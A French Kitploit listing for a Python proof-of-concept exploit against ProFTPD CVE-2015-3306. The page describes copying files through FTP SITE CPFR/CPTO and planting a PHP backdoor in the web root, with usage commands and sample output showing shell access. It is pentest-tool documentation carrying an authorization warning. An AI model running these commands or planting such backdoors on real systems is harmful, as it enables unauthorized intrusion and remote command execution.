Skip to content
KitploitKITPLOIT
OutilsBlog
Soumettre
OutilsBlog
Soumettre

Outils de Hacking, PenTest et Cybersécurité pour votre Arsenal de Sécurité !

Kitploit est un répertoire d'outils de hacking, de cybersécurité et de pentesting. Découvrez les dernières mises à jour des projets pour trouver des vulnérabilités, analyser des systèmes, automatiser les tests et renforcer votre sécurité.

··Flux·Contact·Confidentialité·© 2026 Kitploit

Répertoire d'outils

Catégories

Voir toutes les catégories
Loading categories
CVE-2015-3306 — Exploit PoC Python pour la traversée de répertoire ProFTPD CVE-2015-3306. Copie des fichiers et dépose une backdoor PHP dans le webroot pour l'exécution de commandes à distance via les commandes FTP SITE CPFR/CPTO. | Kitploit
Outils/GitHubGitHub/donmedfor/cve-2015-3306
Génération de PayloadsAnalyse des VulnérabilitésExploitationExploitation d'Applications WebTests d'Intrusion
GitHubdonmedfor/cve-2015-3306

CVE-2015-3306

Exploit PoC Python pour la traversée de répertoire ProFTPD CVE-2015-3306. Copie des fichiers et dépose une backdoor PHP dans le webroot pour l'exécution de commandes à distance via les commandes FTP SITE CPFR/CPTO.

Voir le dépôt
il y a 0 ansPas encore vérifié

Populaires

Voir tout →

Découvrez les outils les plus utilisés par notre communauté.

Explorer tous les outils

Parcourez notre collection d'outils

Voir tous les outils →
Partager

Exploit ProFTPD CVE-2015-3306

Ce dépôt contient un exploit de preuve de concept (PoC) en Python pour CVE-2015-3306

⚠️ Avertissement : Utilisez ceci uniquement sur des systèmes que vous possédez ou pour lesquels vous avez une autorisation explicite de test. L'exploitation non autorisée est illégale.


Auteur

Mohamed EL-KHAROUATI


Partie 1 : Exploit ProFTPD CVE-2015-3306

Description

CVE-2015-3306 est une vulnérabilité de traversée de répertoire dans ProFTPD 1.3.5b et antérieur. Cet exploit permet de copier des fichiers arbitraires et de placer une porte dérobée PHP dans la racine web. La porte dérobée peut exécuter des commandes shell arbitraires.

Fonctionnalités

  • Exploite la vulnérabilité de traversée de répertoire via les commandes FTP SITE CPFR/CPTO.
  • Place une porte dérobée PHP (backdoor.php) dans la racine web spécifiée.
  • Exécute des commandes shell arbitraires via la porte dérobée.
  • Prend en charge les commandes personnalisées via --rcommand.

Prérequis

  • Python 3.x
  • Bibliothèque requests (pip install requests)

Utilisation, sortie et nettoyage (bloc de code unique)

root@kitploit:~
# Run the exploit
python3 exploit.py --rhost <target_ip> --rport <ftp_port> --rpath <web_root_path> --rcommand <shell_command>

# Example:
python3 exploit.py --rhost <target_ip> --rport <targetftp_port> --rpath /var/www/html --rcommand whoami

# Expected Output:
[+] CVE-2015-3306 exploit by Mohamed EL-KHAROUATI
[+] Exploiting <target_ip> 
[+] Running Command whoami
[+] Target exploited, accessing shell at http://<target_ip> /backdoor.php
[+] Running whoami: www-data
[+] Done
Télécharger l’outil